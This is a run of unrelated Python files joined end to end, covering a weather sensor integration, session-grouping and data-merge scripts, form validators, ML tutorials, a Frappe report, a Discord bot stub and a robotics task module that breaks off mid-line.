PLATFORM_SCHEMA.extend({ vol.Required(CONF_API_KEY): cv.string, vol.Required(CONF_APP_KEY): cv.string, vol.Required(CONF_MONITORED_CONDITIONS): vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]), vol.Optional(CONF_UNITS): vol.In([UNITS_SI, UNITS_US]), }) def setup_platform(hass, config, add_entities, discovery_info=None): """Initialize the sensor platform and create a sensor for each monitored condition.""" api_key = config[CONF_API_KEY] app_key = config[CONF_APP_KEY] station_data = AmbientStationData(hass, api_key, app_key) if not station_data.connect_success: _LOGGER.error("Could not connect to weather station API") return sensor_list = [] if CONF_UNITS in config: sys_units = config[CONF_UNITS] elif hass.config.units.is_metric: sys_units = UNITS_SI else: sys_units = UNITS_US for condition in config[CONF_MONITORED_CONDITIONS]: # create a sensor object for each monitored condition sensor_params = SENSOR_TYPES[condition] name = sensor_params[SENSOR_NAME] units = sensor_params[SENSOR_UNITS] if isinstance(units, list): units = sensor_params[SENSOR_UNITS][UNIT_SYSTEM[sys_units]] sensor_list.append(AmbientWeatherSensor(station_data, condition, name, units)) add_entities(sensor_list) class AmbientWeatherSensor(Entity): """Representation of a Sensor.""" def __init__(self, station_data, condition, name, units): """Initialize the sensor.""" self._state = None self.station_data = station_data self._condition = condition self._name = name self._units = units @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self._state @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._units async def async_update(self): """Fetch new state data for the sensor. This is the only method that should fetch new data for Home Assistant. 
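Calls go through station_data.get_data(), which is throttled by SCAN_INTERVAL, so a throttled call can return None and the sensor then falls back to the last cached reading.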
""" _LOGGER.debug("Getting data for sensor: %s", self._name) data = await self.station_data.get_data() if data is None: # update likely got throttled and returned None, so use the cached # data from the station_data object self._state = self.station_data.data[self._condition] else: if self._condition in data: self._state = data[self._condition] else: _LOGGER.warning("%s sensor data not available from the " "station", self._condition) _LOGGER.debug("Sensor: %s | Data: %s", self._name, self._state) class AmbientStationData: """Class to interface with ambient-api library.""" def __init__(self, hass, api_key, app_key): """Initialize station data object.""" self.hass = hass self._api_keys = { 'AMBIENT_ENDPOINT': 'https://api.ambientweather.net/v1', 'AMBIENT_API_KEY': api_key, 'AMBIENT_APPLICATION_KEY': app_key, 'log_level': 'DEBUG' } self.data = None self._station = None self._api = None self._devices = None self.connect_success = False self.get_data = Throttle(SCAN_INTERVAL)(self.async_update) self._connect_api() # attempt to connect to API async def async_update(self): """Get new data.""" # refresh API connection since servers turn over nightly _LOGGER.debug("Getting new data from server") new_data = None await self.hass.async_add_executor_job(self._connect_api) await asyncio.sleep(2) # need minimum 2 seconds between API calls if self._station is not None: data = await self.hass.async_add_executor_job( self._station.get_data) if data is not None: new_data = data[0] self.data = new_data else: _LOGGER.debug("data is None type") else: _LOGGER.debug("Station is None type") return new_data def _connect_api(self): """Connect to the API and capture new data.""" from ambient_api.ambientapi import AmbientAPI self._api = AmbientAPI(**self._api_keys) self._devices = self._api.get_devices() if self._devices: self._station = self._devices[0] if self._station is not None: self.connect_success = True else: _LOGGER.debug("No station devices available") import urllib3 import json # OBJECTIVE: create json object for set of sessions by each unique visitor. one session is a group of events with # less than 10 minutes between events following the first one. 
a visitor (marked by visitor id) # can have multiple sessions # DATA CONSTRAINT: visitors data can be in any order, timestamps are in milliseconds, # generated sessions of visitor must be in chronological, URLs sorted in chronological, # duration = 0 when there is only one event in the session # 600 000 milliseconds = 10 minutes def main(): # allows for requests and keeps track of connection pools http = urllib3.PoolManager() # get the json data and load it into respDict as a dictionary resp = http.request('GET', 'https://candidate.hubteam.com/candidateTest/v3/problem/dataset?userKey=<KEY>') print(resp.status) respDict = json.loads(resp.data) sessionDict = {} # iterate through all the events for singleEvent in respDict["events"]: # if the visitor is new, start an array and add an array containing url and timestamp of event to it # add the visitor array to sessionDict if singleEvent["visitorId"] not in sessionDict.keys(): visitorArr = [] visitorArr.append([singleEvent["url"], singleEvent["timestamp"]]) sessionDict[singleEvent["visitorId"]] = visitorArr # else if the visitor has a previous event, update their sessionDict value by adding the new event elif singleEvent["visitorId"] in sessionDict.keys(): dictValArr = sessionDict[singleEvent["visitorId"]] dictValArr.append([singleEvent["url"], singleEvent["timestamp"]]) sessionDict[singleEvent["visitorId"]] = dictValArr # iterate through all the users for user in sessionDict.keys(): # sort the user events array by timestamp sessionDict[user].sort(key = lambda x:x[1]) # if a user only has one event, value is updated as follows: if len(sessionDict[user]) == 1: duration = 0 pages = [sessionDict[user][0][0]] startTime = sessionDict[user][0][1] sessionDict[user] = [{ "duration": duration, "pages": pages, "startTime": startTime }] # else if user has multiple events...must separate into sessions... 
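# Worked example of the 600000 ms rule (hypothetical timestamps): events at
# t=0, t=300000 and t=1200000 form two sessions, since 300000 - 0 <= 600000 keeps
# the first pair together while 1200000 - 300000 > 600000 starts a new session;
# session one has duration 300000 and the single-event session has duration 0.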
elif len(sessionDict[user]) > 1: # array for all the sessions of a user sessionsArr = [] # array of a single session singleSession = [] # add the first event of a user into the single session array singleSession.append(sessionDict[user][0]) # simple for loop index iteration for eventIndex in range(len(sessionDict[user]) - 1): # if the following event is less than or equal to 10 minutes than the last one in the single session, add it to the single session if (sessionDict[user][eventIndex + 1][1] - sessionDict[user][eventIndex][1]) <= 600000: singleSession.append(sessionDict[user][eventIndex + 1]) # if the following event is greater than 10 minutes, add this single session to sessions array, clear single session, add following event elif (sessionDict[user][eventIndex + 1][1] - sessionDict[user][eventIndex][1]) > 600000: sessionsArr.append(singleSession) singleSession = [] singleSession.append(sessionDict[user][eventIndex + 1]) # add the last single session to sessions array sessionsArr.append(singleSession) # array to hold formatted sessions data formattedSessionsArr = [] # iterate through all the sessions for session in sessionsArr: # duration is last event timestamp - first event duration = session[len(session) - 1][1] - session[0][1] # make pages array with all the pages visited in a single session pages = [] for singleEvent in session: pages.append(singleEvent[0]) # startTime is timestamp of the first event startTime = session[0][1] # format each session and update the users value in sessionDict singleSessFormat = { "duration": duration, "pages": pages, "startTime": startTime } formattedSessionsArr.append(singleSessFormat) sessionDict[user] = formattedSessionsArr # label the final data, convert to json, POST, check status final = {"sessionsByUser":sessionDict} toJSON = json.dumps(final) resp = http.request('POST', 'https://candidate.hubteam.com/candidateTest/v3/problem/result?userKey=<KEY>', headers={'Content-Type': 'application/json'}, body=toJSON) print(resp.status) if __name__ == '__main__': main()# Make core client functions available without prefix. # # This file is Copyright (c) 2010 by the GPSD project # BSD terms apply: see the file COPYING in the distribution root for details. # # This code runs compatibly under Python 2 and 3.x for x >= 2. # Preserve this property! from __future__ import absolute_import # Ensure Python2 behaves like Python 3 from .gps import * from .misc import * # Keep in sync with GPSD_PROTO_MAJOR_VERSION and GPSD_PROTO_MINOR_VERSION in # gpsd.h api_major_version = 3 # bumped on incompatible changes api_minor_version = 14 # bumped on compatible changes # keep in sync with gpsd_version in SConstruct __version__ = '3.19-dev' # The 'client' module exposes some C utility functions for Python clients. # The 'packet' module exposes the packet getter via a Python interface. # -*- coding: utf-8 -*- """HR-specific validation helpers.""" from __future__ import unicode_literals import re from localflavor.stub import EMPTY_VALUES from localflavor.exceptions import ValidationError from localflavor.base import CharValidator, Select from localflavor.stub import _ from .hr_counties import COUNTY_CHOICES postal_code_re = re.compile(r'^\d{5}$') class HRCountySelect(Select): """A Select widget that uses a list of counties of Croatia as its choices.""" def __init__(self, attrs=None): super(HRCountySelect, self).__init__(attrs, choices=COUNTY_CHOICES) class HRPostalCodeField(CharValidator): """ Postal code of Croatia field. 
It consists of exactly five digits ranging from 10000 to possibly less than 60000. http://www.posta.hr/main.aspx?id=66 """ default_error_messages = { 'invalid': _('Enter a valid 5 digit postal code.'), } def clean(self, value): super(HRPostalCodeField, self).clean(value) if value in EMPTY_VALUES: return self.empty_value value = value.strip() if not postal_code_re.search(value): raise ValidationError(self.error_messages['invalid']) # Make sure the number is in valid range. if not 9999 < int(value) < 60000: raise ValidationError(self.error_messages['invalid']) return '%s' % value <filename>keras0/keras_tutorial_deeplearning.py import numpy as np np.random.seed(123) from keras.models import Sequential from keras.layers import Dense, Dropout, Activation, Flatten from keras.layers import Convolution2D, MaxPooling2D from keras.utils import np_utils from keras.datasets import mnist # globals: debugim=False # pre-shuffled data from the keras data loader... (X_train, y_train), (X_test, y_test) = mnist.load_data() print (X_train.shape) from matplotlib import pyplot as plt # show a first image in dataset if debugim: plt.imshow(X_train[0]) plt.show() a = X_test.shape[1] X_train = X_train.reshape(X_train.shape[0], a, a, 1) X_test = X_test.reshape(X_test.shape[0],a, a, 1) print(X_test.shape) # need brightness vales to be float32:s in [0,1] X_train = X_train.astype('float32') X_test = X_test.astype('float32') X_train /= 255 X_test /= 255 # print(y_train[:10]) # change number output to a bool-vector hit output (better?) y_train = np_utils.to_categorical(y_train, 10) y_test = np_utils.to_categorical(y_test, 10) ## --> [0, 0, 1, 0, 0, 0 ..., 0] == 2 model = Sequential() # note: step size == 1,1 can be changed using 'subsample' property model.add(Convolution2D(32, 3, 3, activation='relu', input_shape=(a, a, 1))) # DEBUG # print(model.output_shape) model.add(Convolution2D(32,3,3,activation='relu')) model.add(MaxPooling2D(pool_size=(2,2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(10, activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) model.fit(X_train, y_train, batch_size=32, epochs=10, verbose=1) <filename>Data Analysis/Combine Data/combine_weather_air_pollution_covid.py import datetime import pandas as pd import sys import os from pathlib import Path sys.path.append(os.path.join(os.path.join(os.path.join(os.path.join(os.path.dirname(__file__), '..'), '..'), 'Data Collection'), 'Apparatus')) # sys.path.append(Path(os.path.dirname(__file__) + '../../Data Collection/Apparatus')) from zip_conversion import state_to_abbreviation df = pd.read_csv(Path('Data Analysis/Combine Data/combined_weather_air_pollution_data_by_county.csv')) covid = pd.read_csv(Path('Data Analysis/Combine Data/combined_air_pollution_covid_data.csv'))[['state', 'county', 'Date', 'Confirmed']] covid = covid.rename(columns={'Date':'date_local'}) df['date_local'] = [datetime.datetime.strptime('/'.join([i.zfill(2) for i in date.split('/')[:2]] + date.split('/')[-1:]), '%m/%d/%Y').date() for date in df['date_local']] covid['date_local'] = [datetime.datetime.strptime(date, '%Y-%m-%d').date() for date in covid['date_local']] df['county'] = [i.replace(' County', '').replace(' City', '') for i in df['county']] abbreviation_df = pd.read_csv(Path('Data Collection/Apparatus/Docs/states_and_counties.csv')) covid['state'] = [state_to_abbreviation(i, abbreviation_df) for i in covid['state']] df.merge(covid, 
how='outer', on=['state', 'county', 'date_local']).to_csv('final_data.csv', index=False)#!/usr/bin/python """ Use normalized count matrix provided by DESeq2 to get transformed values """ __author__ = "<NAME>" import sys,os,getopt,csv,time,re,gc import numpy as np ## declare variables #homeDir = os.path.join(os.path.expanduser("~"),"sequencing","pieris") def load_file(sample): ## error check resultsFile = os.path.join(homeDir,'features',sample,'quant.sf') if not os.path.exists(resultsFile): raise Exception("Cannot find results file %s"%resultsFile) ## infile fidin = open(resultsFile,'r') reader = csv.reader(fidin,delimiter="\t") debug = 0 header = ['Transcript','Length','TPM','RPKM','KPKM','EstimatedNumKmers','EstimatedNumReads'] results = {} for key in header: results[key] = [] gc.disable() for linja in reader: if linja[0][0] == '#': continue results['Transcript'].append(linja[0]) results['TPM'].append(linja[2]) results['RPKM'].append(linja[3]) results['EstimatedNumReads'].append(linja[6]) gc.enable() return results if __name__ == "__main__": sampleList = ["17", "18", "33", "46", "56", "61", "DL47", "DL61", "D163", "D178", "D185", "D239"] allResults = {} for sample in sampleList: allResults[sample] = load_file(sample) def write_matrix(column): numTranscripts = len(allResults['17']['Transcript']) ## create a count matrix if column == 'EstimatedNumReads': outFile = os.path.join(homeDir,'features','est_counts.csv') else: outFile = os.path.join(homeDir,'features','%s_counts.csv'%(column.lower())) fidout = open(outFile,'w') writer = csv.writer(fidout) writer.writerow(['transcript'] + sampleList) for row in range(numTranscripts): trans = allResults['17']['Transcript'][row] toWrite = [allResults[s][column][row] for s in sampleList] writer.writerow([trans] + toWrite) write_matrix('EstimatedNumReads') write_matrix('TPM') write_matrix('RPKM') print('complete.') # Copyright (c) 2013, 9t9IT and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _ def execute(filters=None): columns, data = get_columns(filters), get_data(filters) return columns, data def get_columns(filters): return [ { "label": _("Date"), "fieldname": "date", "fieldtype": "Date", "width": 120 }, { "label": _("Doc No"), "fieldname": "doc_no", "fieldtype": "Link", "options": "Stock Entry", "width": 120 }, { "label": _("Job Code"), "fieldname": "job_code", "fieldtype": "Data", "width": 120 }, { "label": _("Job Name"), "fieldname": "job_name", "fieldtype": "Link", "options": "Project", "width": 120 }, { "label": _("Qty"), "fieldname": "qty", "fieldtype": "Int", "width": 80 } ] def get_data(filters): import pprint data = [] material_issues = _get_material_issues(filters) data = material_issues return data def _get_sql_conditions(filters): conditions = [] if filters.get('job_code'): conditions.append('`tabProject`.ashbee_project_code = %(job_code)s') if filters.get('item_code'): conditions.append('`tabStock Entry Detail`.item_code = %(item_code)s') if filters.get('stock_entry'): conditions.append('`tabStock Entry`.name = %(stock_entry)s') return ' AND '.join(conditions) def _get_material_issues(filters): sql_conditions = _get_sql_conditions(filters) if sql_conditions: sql_conditions = 'AND {}'.format(sql_conditions) return frappe.db.sql(""" SELECT `tabStock Entry`.posting_date AS 'date', `tabStock Entry`.name AS doc_no, `tabProject`.ashbee_project_code AS job_code, `tabStock Entry`.project AS job_name, SUM(`tabStock Entry Detail`.qty) AS qty FROM `tabStock 
Entry Detail` INNER JOIN `tabStock Entry` ON `tabStock Entry Detail`.parent = `tabStock Entry`.name INNER JOIN `tabProject` on `tabStock Entry`.project = `tabProject`.name WHERE `tabStock Entry`.docstatus = 1 {sql_conditions} AND `tabStock Entry`.purpose = 'Material Issue' AND `tabStock Entry`.posting_date BETWEEN %(from_date)s AND %(to_date)s GROUP BY `tabStock Entry`.name ORDER BY `tabStock Entry`.posting_date DESC """.format(sql_conditions=sql_conditions), filters, as_dict=1) <gh_stars>0 from flask_wtf import FlaskForm from wtforms import StringField, SubmitField, SelectField, PasswordField from wtforms.validators import DataRequired, URL class NewBookmarkForm(FlaskForm): url = StringField("url", validators=[DataRequired(), URL()]) path = SelectField("Topic") desc = StringField("desc") tags = StringField("tags") submit = SubmitField("Save") class NewNoteForm(FlaskForm): title = StringField("title", validators=[DataRequired()]) path = SelectField("Topic") desc = StringField("desc") tags = StringField("tags") submit = SubmitField("Save") class DeleteDataForm(FlaskForm): submit = SubmitField("Delete") class UserForm(FlaskForm): username = StringField("username") password = PasswordField("password") submit = SubmitField("Submit") <filename>opzoo/Convolution/Convolution.py import mobula from mobula.const import req @mobula.op.register class Conv2D: def __init__(self, channels, kernel_size, strides=(1, 1), padding=(0, 0), dilation=(1, 1), groups=1): self.channels = channels self.kernel_size = kernel_size self.strides = strides self.padding = padding self.dilation = dilation assert groups == 1 self.groups = groups def forward(self, x, weight, bias=None): # y = wx + b N, C, H, W = x.shape KH, KW = self.kernel_size PH, PW = self.padding SH, SW = self.strides DH, DW = self.dilation _, D, OH, OW = self.y.shape csize = C * KH * KW data_col = self.F.empty((csize, OH, OW)) rweight = weight.reshape((D, csize)) rbias = bias.reshape((-1, 1, 1)) if bias is not None else None for i in range(N): mobula.func.im2col( data_col.size, x[i], H, W, KH, KW, PH, PW, SH, SW, DH, DW, OH, OW, data_col) out = self.F.dot(rweight, data_col).reshape((D, OH, OW)) if rbias is not None: out += rbias self.assign(self.y[i], self.req[0], out) def backward(self, dy): N, C, H, W = self.dx.shape KH, KW = self.kernel_size PH, PW = self.padding SH, SW = self.strides DH, DW = self.dilation _, D, OH, OW = dy.shape csize = C * KH * KW ohw = OH * OW weightT = self.X[1].reshape((D, csize)).T out = self.F.empty_like(self.dx[0]) dw = 0 for i in range(N): rdy = dy[i].reshape((D, ohw)) data_col = self.F.dot(weightT, rdy) mobula.func.col2im( self.dx[0].size, data_col, H, W, KH, KW, PH, PW, SH, SW, DH, DW, OH, OW, out) self.assign(self.dX[0][i], self.req[0], out) mobula.func.im2col( data_col.size, self.x[i], H, W, KH, KW, PH, PW, SH, SW, DH, DW, OH, OW, data_col) dw += self.F.dot(rdy, data_col.T) self.assign(self.dX[1], self.req[1], dw.reshape_like(self.dX[1])) if len(self.X) == 3: self.assign(self.dX[2], self.req[2], dy.sum(1, exclude=True)) def infer_shape(self, in_shape): assert 2 <= len( in_shape) <= 3, "The inputs should be feature map(NCHW layout), weight and bias(optional)" assert len(in_shape[0]) == 4, "input: NCHW" assert len(in_shape[1]) == 4, "weight: DCKK" assert len(in_shape) == 2 or len(in_shape[2]) == 1, "bias: D" x, weight = in_shape[:2] N, C, H, W = x KH, KW = self.kernel_size PH, PW = self.padding SH, SW = self.strides DH, DW = self.dilation def get_outsize(X, K, P, S, D): K += (K - 1) * (D - 1) return (X + 2 * P - K) // S + 
1 OH = get_outsize(H, KH, PH, SH, DH) OW = get_outsize(W, KW, PW, SW, DW) D = self.channels assert weight[0] == D assert weight[1] == C assert weight[2] == KH assert weight[3] == KW return in_shape, [(N, D, OH, OW)] # Copyright 2017 Mycroft AI Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import importlib import sys from os import listdir from os.path import abspath, dirname, basename, isdir, join from mycroft.util import LOG from ovos_plugin_manager.audio import setup_audio_service as setup_service, load_audio_service_plugins as load_plugins MAINMODULE = '__init__' def create_service_spec(service_folder): """Prepares a descriptor that can be used together with imp. Args: service_folder: folder that shall be imported. Returns: Dict with import information """ module_name = 'audioservice_' + basename(service_folder) path = join(service_folder, MAINMODULE + '.py') spec = importlib.util.spec_from_file_location(module_name, path) mod = importlib.util.module_from_spec(spec) info = {'spec': spec, 'mod': mod, 'module_name': module_name} return {"name": basename(service_folder), "info": info} def get_services(services_folder): """ Load and initialize services from all subfolders. Args: services_folder: base folder to look for services in. Returns: Sorted list of audio services. """ LOG.info("Loading services from " + services_folder) services = [] possible_services = listdir(services_folder) for i in possible_services: location = join(services_folder, i) if (isdir(location) and not MAINMODULE + ".py" in listdir(location)): for j in listdir(location): name = join(location, j) if (not isdir(name) or not MAINMODULE + ".py" in listdir(name)): continue try: services.append(create_service_spec(name)) except Exception: LOG.error('Failed to create service from ' + name, exc_info=True) if (not isdir(location) or not MAINMODULE + ".py" in listdir(location)): continue try: services.append(create_service_spec(location)) except Exception: LOG.error('Failed to create service from ' + location, exc_info=True) return sorted(services, key=lambda p: p.get('name')) def load_internal_services(config, bus, path=None): """Load audio services included in Mycroft-core. Args: config: configuration dict for the audio backends. 
bus: Mycroft messagebus path: (default None) optional path for builtin audio service implementations Returns: List of started services """ if path is None: path = dirname(abspath(__file__)) + '/services/' service_directories = get_services(path) service = [] for descriptor in service_directories: try: service_module = descriptor['info']['mod'] spec = descriptor['info']['spec'] module_name = descriptor['info']['module_name'] sys.modules[module_name] = service_module spec.loader.exec_module(service_module) except Exception as e: LOG.error('Failed to import module ' + descriptor['name'] + '\n' + repr(e)) else: s = setup_service(service_module, config, bus) if s: LOG.info('Loaded ' + descriptor['name']) service += s return service def load_services(config, bus, path=None): """Load builtin services as well as service plugins The builtin service folder is scanned (or a folder indicated by the path parameter) for services and plugins registered with the "mycroft.plugin.audioservice" entrypoint group. Args: config: configuration dict for the audio backends. bus: Mycroft messagebus path: (default None) optional path for builtin audio service implementations Returns: List of started services. """ return (load_internal_services(config, bus, path) + load_plugins(config, bus)) __version__ = '0.0.6' default_app_config = 'contractor.apps.ContractorConfig' <reponame>ThatOneWanderingWeirdo/Sleepbot import discord from discord.ext import commands def get_prefix(bot, message): """A callable Prefix for our bot. This could be edited to allow per server prefixes.""" # Notice how you can use spaces in prefixes. Try to keep them simple though. prefixes = ['!'] # Check to see if we are outside of a guild. e.g DM's etc. if not message.guild: # Only allow ? to be used in DMs return '?' # If we are in a guild, we allow for the user to mention us or use any of the prefixes in our list. return commands.when_mentioned_or(*prefixes)(bot, message) initial_extensions = ['cogs.members', 'cogs.announcements'] bot = commands.Bot(command_prefix=get_prefix, description='A Rewrite Cog Example') # Here we load our extensions(cogs) listed above in [initial_extensions]. if __name__ == '__main__': for extension in initial_extensions: bot.load_extension(extension) @bot.event async def on_ready(): """http://discordpy.readthedocs.io/en/rewrite/api.html#discord.on_ready""" print(f'\n\nLogged in as: {bot.user.name} - {bot.user.id}\nVersion: {discord.__version__}\n') print(f'Successfully logged in and booted...!') bot.run('TOKENHERE', bot=True, reconnect=True) <gh_stars>0 """ Copyright (c) 2016 Cisco and/or its affiliates. This software is licensed to you under the terms of the Apache License, Version 2.0 (the "License"). You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 The code, technical concepts, and all information contained herein, are the property of Cisco Technology, Inc. and/or its affiliated entities, under various laws including copyright, international treaties, patent, and/or contract. Any use of the material herein must be in accordance with the terms of the License. All rights not expressly granted by the License are reserved. Unless required by applicable law or agreed to separately in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
Purpose: Blackbox test for the Deployment manager """ import time import argparse import json import requests from requests.exceptions import RequestException import eventlet from pnda_plugin import PndaPlugin from pnda_plugin import Event TIMESTAMP_MILLIS = lambda: int(round(time.time() * 1000)) TESTBOTPLUGIN = lambda: Flink() class Flink(PndaPlugin): ''' Flink test plugin for the Flink History Server ''' def __init__(self): pass def read_args(self, args): ''' This class argument parser. This shall come from main runner in the extra arg ''' parser = argparse.ArgumentParser(prog=self.__class__.__name__, usage='%(prog)s [options]', description='Show state of Flink History server') parser.add_argument('--fhendpoint', default='http://localhost:8082', help='Flink History Server endpoint e.g. http://localhost:8082') return parser.parse_args(args) @staticmethod def validate_api_response(response, path, other_exp_codes=None): expected_codes = [200] if other_exp_codes: expected_codes.extend(other_exp_codes) if response.status_code in expected_codes: return 'SUCCESS', None cause_msg = 'Flink History Server - {} (request path = {})'.format(response.text.strip(), path) return 'FAIL', cause_msg def runner(self, args, display=True): """ Main section. """ plugin_args = args.split() \ if args is not None and args.strip() \ else "" options = self.read_args(plugin_args) cause = [] values = [] hs_available_success, hs_completed_jobs_success = False, False hs_available_ms, hs_completed_jobs_ms = -1, -1 installed_flink_version, completed_job_count = '', -1 # noinspection PyBroadException try: path = '/config' start = TIMESTAMP_MILLIS() with eventlet.Timeout(100): req = requests.get("%s%s" % (options.fhendpoint, path), timeout=20) end = TIMESTAMP_MILLIS() hs_available_ms = end - start status, msg = Flink.validate_api_response(req, path) if status == 'SUCCESS': installed_flink_version = json.loads(req.text).get("flink-version", '') hs_available_success = True else: cause.append(msg) except RequestException: cause.append('Unable to connect to the Flink History Server (request path = {})'.format(path)) except Exception as except_obj: cause.append('Platform Testing Client Error- ' + str(except_obj)) # noinspection PyBroadException try: path = '/joboverview' start = TIMESTAMP_MILLIS() with eventlet.Timeout(100): req = requests.get("%s%s" % (options.fhendpoint, path), timeout=20) end = TIMESTAMP_MILLIS() hs_completed_jobs_ms = end - start # 404 - added to the expected response codes because, # Flink history server return 404, unless at least one flink job is executed. 
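# A 200 response is expected to carry a JSON body whose 'finished' list contains
# the completed jobs (its length is reported as the completed-job count below),
# while a 404 is treated as "no jobs completed yet" rather than a failure.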
status, msg = Flink.validate_api_response(req, path, [404]) if status == 'SUCCESS': if req.status_code == 200: completed_job_count = len(json.loads(req.text).get('finished')) elif req.status_code == 404: completed_job_count = 0 hs_completed_jobs_success = True else: cause.append(msg) except RequestException: cause.append('Unable to connect to the Flink History Server (request path = {})'.format(path)) except Exception as except_obj: cause.append('Platform Testing Client Error- ' + str(except_obj)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_available_success", [], hs_available_success)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.installed_flink_version", [], installed_flink_version)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_available_ms", [], hs_available_ms)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_completed_jobs_success", [], hs_completed_jobs_success)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_completed_jobs_count", [], completed_job_count)) values.append(Event(TIMESTAMP_MILLIS(), "flink", "flink.history_server_completed_jobs_ms", [], hs_completed_jobs_ms)) health = "OK" if not hs_available_success or not hs_completed_jobs_success: health = "ERROR" values.append(Event(TIMESTAMP_MILLIS(), 'flink', 'flink.health', cause, health)) if display: self._do_display(values) return values <reponame>incognite-lab/myGym from myGym.envs.vision_module import VisionModule import matplotlib.pyplot as plt import pybullet as p import time import numpy as np import pkg_resources import cv2 import random from scipy.spatial.distance import cityblock import math currentdir = pkg_resources.resource_filename("myGym", "envs") class TaskModule(): """ Task module class for task management Parameters: :param task_type: (string) Type of learned task (reach, push, ...) 
:param num_subgoals: (int) Number of subgoals in task :param task_objects: (list of strings) Objects that are relevant for performing the task :param reward_type: (string) Type of reward signal source (gt, 3dvs, 2dvu) :param distance_type: (string) Way of calculating distances (euclidean, manhattan) :param logdir: (string) Directory for logging :param env: (object) Environment, where the training takes place """ def __init__(self, task_type='reach', task_objects='cube_holes', num_subgoals=0, reward_type='gt', vae_path=None, yolact_path=None, yolact_config=None, distance_type='euclidean', logdir=currentdir, env=None): self.task_type = task_type self.reward_type = reward_type self.distance_type = distance_type self.logdir = logdir self.task_objects_names = task_objects self.num_subgoals = num_subgoals self.env = env self.image = None self.depth = None self.last_distance = None self.init_distance = None self.current_norm_distance = None self.stored_observation = [] self.fig = None self.threshold = 0.1 # distance threshold for successful task completion self.obsdim = (len(env.task_objects_names) + 1) * 3 self.angle = None self.prev_angle = None self.pressed = None self.turned = None self.desired_angle = 57 self.coefficient_kd = 0 self.coefficient_kw = 0 self.coefficient_ka = 0 if self.task_type == '2stepreach': self.obsdim = 6 if self.reward_type == 'gt': src = 'ground_truth' elif self.reward_type == '3dvs': src = 'yolact' elif self.reward_type == '2dvu': src = 'vae' elif self.reward_type == '6dvs': src = 'dope' self.obsdim += 6 else: raise Exception("You need to provide valid reward type.") self.vision_module = VisionModule(vision_src=src, env=env, vae_path=vae_path, yolact_path=yolact_path, yolact_config=yolact_config) if src == "vae": self.obsdim = self.vision_module.obsdim def reset_task(self): """ Reset task relevant data and statistics """ self.last_distance = None self.init_distance = None self.current_norm_distance = None self.angle = None self.pressed = None self.turned = None self.vision_module.mask = {} self.vision_module.centroid = {} self.vision_module.centroid_transformed = {} self.env.task_objects.append(self.env.robot) if self.reward_type == '2dvu': self.generate_new_goal(self.env.objects_area_boarders, self.env.active_cameras) self.subgoals = [False]*self.num_subgoals #subgoal completed? 
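# self.subgoals records which subgoals have been completed so far; check_goal()
# marks an entry True each time a '2stepreach' subgoal is reached and keeps the
# episode running until no False entries remain.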
if self.task_type == '2stepreach': self.obs_sub = [[0,2],[0,1]] #objects to have in observation for given subgoal self.sub_idx = 0 def render_images(self): render_info = self.env.render(mode="rgb_array", camera_id=self.env.active_cameras) self.image = render_info[self.env.active_cameras]["image"] self.depth = render_info[self.env.active_cameras]["depth"] if self.env.visualize == 1 and self.reward_type != '2dvu': cv2.imshow("Vision input", cv2.cvtColor(self.image, cv2.COLOR_RGB2BGR)) cv2.waitKey(1) def visualize_2dvu(self, recons): imsize = self.vision_module.vae_imsize actual_img, goal_img = [(lambda a: cv2.resize(a[60:390, 160:480], (imsize, imsize)))(a) for a in [self.image, self.goal_image]] images = [] for idx, im in enumerate([actual_img, recons[0], goal_img, recons[1]]): im = cv2.copyMakeBorder(im, 30, 10, 10, 20, cv2.BORDER_CONSTANT, value=[255, 255, 255]) cv2.putText(im, ["actual", "actual rec", "goal", "goal rec"][idx], (10, 20), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0), 1, 0) images.append(cv2.cvtColor(im, cv2.COLOR_RGB2BGR)) fig = np.vstack((np.hstack((images[0], images[1])), np.hstack((images[2], images[3])))) cv2.imshow("Scene", fig) cv2.waitKey(1) def get_observation(self): """ Get task relevant observation data based on reward signal source Returns: :return self._observation: (array) Task relevant observation data, positions of task objects """ obj_positions, obj_orientations = [], [] self.render_images() if self.reward_type != "gt" else None if self.reward_type == '2dvu': obj_positions, recons = (self.vision_module.encode_with_vae(imgs=[self.image, self.goal_image], task=self.task_type, decode=self.env.visualize)) obj_positions.append(list(self.env.robot.get_position())) self.visualize_2dvu(recons) if self.env.visualize == 1 else None else: if self.task_type == '2stepreach': self.current_task_objects = [self.env.task_objects[x] for x in self.obs_sub[self.sub_idx]] #change objects in observation based on subgoal else: self.current_task_objects = self.env.task_objects #all objects in observation for env_object in self.current_task_objects: obj_positions.append(self.vision_module.get_obj_position(env_object,self.image,self.depth)) if self.reward_type == '6dvs' and self.task_type != 'reach' and env_object != self.env.task_objects[-1]: obj_orientations.append(self.vision_module.get_obj_orientation(env_object,self.image)) if self.env.has_distractor: obj_positions.append(self.env.robot.get_links_observation(self.env.observed_links_num)) obj_positions[len(obj_orientations):len(obj_orientations)] = obj_orientations self._observation = np.array(sum(obj_positions, [])) return self._observation def check_vision_failure(self): """ Check if YOLACT vision model fails repeatedly during episode Returns: :return: (bool) """ self.stored_observation.append(self._observation) if len(self.stored_observation) > 9: self.stored_observation.pop(0) if self.reward_type == '3dvs': # Yolact assigns 10 to not detected objects if all(10 in obs for obs in self.stored_observation): return True return False def check_time_exceeded(self): """ Check if maximum episode time was exceeded Returns: :return: (bool) """ if (time.time() - 